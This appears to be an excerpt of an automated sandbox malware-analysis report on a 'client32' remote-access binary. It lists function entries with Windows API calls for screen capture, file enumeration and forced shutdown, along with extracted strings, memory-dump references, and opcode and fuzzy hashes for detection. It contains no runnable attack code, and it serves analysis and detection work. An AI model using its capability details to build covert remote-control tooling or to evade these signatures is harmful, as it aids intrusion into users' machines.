                                                                                                                                                                                • Opcode ID: 2989f9fc076609208fe8f757cf33271c9ecc8c58afb4ceed34eabbf4f2fe23b4
                                                                                                                                                                                • Instruction ID: 9696ad3ca0883fb10a5f2dea9055d116aa85bad3f4f27e9d9af2d17af3abc9b9
                                                                                                                                                                                • Opcode Fuzzy Hash: 2989f9fc076609208fe8f757cf33271c9ecc8c58afb4ceed34eabbf4f2fe23b4
                                                                                                                                                                                • Instruction Fuzzy Hash: BA01D4313062119FFB159E26CC54B9B7765AB8236CF108629EC16CBA82DBBDD400CF5C
                                                                                                                                                                                Function 1105F7C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4104443479-0
                                                                                                                                                                                • Opcode ID: 644d72685bd799ab7c759e7c1667c5aa8d9c007b3255665d3eb0df221dcdd346
                                                                                                                                                                                • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                                                                                                                • Opcode Fuzzy Hash: 644d72685bd799ab7c759e7c1667c5aa8d9c007b3255665d3eb0df221dcdd346
                                                                                                                                                                                • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                                                                                                                Function 1117602D Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • __tzset_nolock.LIBCMT ref: 11176056
                                                                                                                                                                                  • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                                                                                                                  • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                                                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                                                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                                                                                                                  • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                                                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                                                                                                                  • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                                                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__malloc_crt__tzset_nolock_strcpy_s
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1672088907-0
                                                                                                                                                                                • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                                                                                                • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                                                                                                                • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                                                                                                • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                                                                                                                Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __waccess_s
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4272103461-0
                                                                                                                                                                                • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                                • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                                                                                                                • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                                • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                                                                                                Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __fsopen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3646066109-0
                                                                                                                                                                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                                • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                                                                                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                                • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                                                                                                                Function 00C31000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _NSMClient32@8.PCICL32(?,?,?,00C310A2,00000000), ref: 00C3100B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3004840074.0000000000C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00C30000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3004820083.0000000000C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3004861029.0000000000C32000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_c30000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Client32@8
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 433899448-0
                                                                                                                                                                                • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                                                                                                • Instruction ID: b8ac39b25a4cc03c874a38d30389c8ffff5fe2723660c1c7c041344200375b7b
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                                                                                                • Instruction Fuzzy Hash: B5B092B212438D9B8718EE98E841C7B33DCAA98600F04080ABD0553282CA61FC60A671
                                                                                                                                                                                Function 110886C0 Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,?,00000000,11182F3E,000000FF), ref: 11088750
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 32694325-0
                                                                                                                                                                                • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                                                                                                • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                                                                                                                • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                                                                                                                • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90

                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                Function 1105D5C0 Relevance: 88.3, APIs: 37, Strings: 13, Instructions: 772windowfiletimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • timeGetTime.WINMM ref: 1105D5FB
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 1105D673
                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1105D681
                                                                                                                                                                                • GetDeviceCaps.GDI32 ref: 1105D6DC
                                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 1105D6ED
                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1105D701
                                                                                                                                                                                • CloseDesktop.USER32(?), ref: 1105D75D
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1105D7C4
                                                                                                                                                                                • wsprintfA.USER32 ref: 1105D7D4
                                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,?,00000004,00000000,?,?), ref: 1105D7FB
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 1105D816
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1105D85B
                                                                                                                                                                                • CreateDIBSection.GDI32(00000000,00000028,00000000,?,?,?), ref: 1105D88A
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1105D898
                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1105D8EB
                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 1105D913
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 1105D921
                                                                                                                                                                                • SetStretchBltMode.GDI32 ref: 1105D9B5
                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 1105D9EA
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1105D9F4
                                                                                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 1105DAA2
                                                                                                                                                                                • _free.LIBCMT ref: 1105DC2C
                                                                                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000028,?,00000028,00000000), ref: 1105DC60
                                                                                                                                                                                • timeGetTime.WINMM(00000000,00000004,?,?,?,00000000), ref: 1105DC86
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 1105DC9A
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1105DCAD
                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 1105DCB6
                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 1105DCC1
                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 1105DCD5
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 1105DCE2
                                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1105DCEB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$Create$DeleteSelect$Compatible$BitsCapsCloseDeviceFileStretchTimetime$BitmapCurrentDesktopErrorHandleLastMappingModeReleaseSectionThreadView_freewsprintf
                                                                                                                                                                                • String ID: $($($*LegacyThumbnails$*TraceThumbs$Client$Client32ThumbDib_%x$Default$GetDIBits ret %d lines$StretchBlt ret %d, e=%d$_debug$silent$thumb %d*%d -> %d*%d*%d (limit=%d*%d), nBytes=%d, blitTime=%d, packTime=%d, sendTime=%d
                                                                                                                                                                                • API String ID: 163019656-2061591591
                                                                                                                                                                                • Opcode ID: d159abba9650858e9e93b88ec731c09f46f1077b2d9a8f065279b8786d7aa882
                                                                                                                                                                                • Instruction ID: 30bd9f7a2ea7e705dc485189ea96a0efca61ad6dd934f84e61c0e57e8b39a9bf
                                                                                                                                                                                • Opcode Fuzzy Hash: d159abba9650858e9e93b88ec731c09f46f1077b2d9a8f065279b8786d7aa882
                                                                                                                                                                                • Instruction Fuzzy Hash: 76623E75A402299FEB64CF64CC81FDAB7B5AF49304F1481E9E909AB245DB70EE81CF50
                                                                                                                                                                                Function 1102D900 Relevance: 68.8, APIs: 20, Strings: 19, Instructions: 575sleepfileshutdownCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(111EE4B8), ref: 1102D952
                                                                                                                                                                                • Sleep.KERNEL32(0000EA60), ref: 1102D975
                                                                                                                                                                                  • Part of subcall function 11027580: PostThreadMessageA.USER32(00000000,00000501,?,00000000), ref: 110275D2
                                                                                                                                                                                  • Part of subcall function 11027580: Sleep.KERNEL32(00000032), ref: 110275D6
                                                                                                                                                                                  • Part of subcall function 11027580: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                                                                                                                                  • Part of subcall function 11027580: WaitForSingleObject.KERNEL32(00000000,00000032), ref: 11027602
                                                                                                                                                                                  • Part of subcall function 11027580: CloseHandle.KERNEL32(00000000), ref: 11027614
                                                                                                                                                                                  • Part of subcall function 11027580: FreeLibrary.KERNEL32(00000000,00000000,00000000), ref: 11027641
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020), ref: 1102D97B
                                                                                                                                                                                • SetPriorityClass.KERNEL32(00000000), ref: 1102D982
                                                                                                                                                                                • SetEvent.KERNEL32(00000270), ref: 1102D9B7
                                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 1102DAA8
                                                                                                                                                                                • PostThreadMessageA.USER32(00000D38,00000000,00000000,00000000), ref: 1102DB8C
                                                                                                                                                                                • CloseHandle.KERNEL32(000002B0), ref: 1102DDE5
                                                                                                                                                                                • _free.LIBCMT ref: 1102DDF5
                                                                                                                                                                                • _free.LIBCMT ref: 1102DE11
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102DEA4
                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1102DEB1
                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102DF6B
                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102DF92
                                                                                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102DF99
                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 1102E087
                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 1102E08E
                                                                                                                                                                                • ExitWindowsEx.USER32(00000006,00000000), ref: 1102E0A4
                                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 1102E0B0
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 1102E0C4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait
                                                                                                                                                                                • String ID: *.*$301389$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                                                                                                                • API String ID: 3727406315-782505151
                                                                                                                                                                                • Opcode ID: 86059becb217dd49c43b6a859202c899f48a79d058e7cee14b85880d7a335abc
                                                                                                                                                                                • Instruction ID: c244b697f97c953c441d2c5976e96690dee26513cfaa247af0b6fd081f703830
                                                                                                                                                                                • Opcode Fuzzy Hash: 86059becb217dd49c43b6a859202c899f48a79d058e7cee14b85880d7a335abc
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F12F574E026369FE706DFE4CCD0E6DB7A5AB8470CF600179E52657288EB71AD80CB52
                                                                                                                                                                                Function 111273E0 Relevance: 65.0, APIs: 29, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                                                                                                                • _strrchr.LIBCMT ref: 111274AA
                                                                                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                                                                                                                • wsprintfA.USER32 ref: 11127561
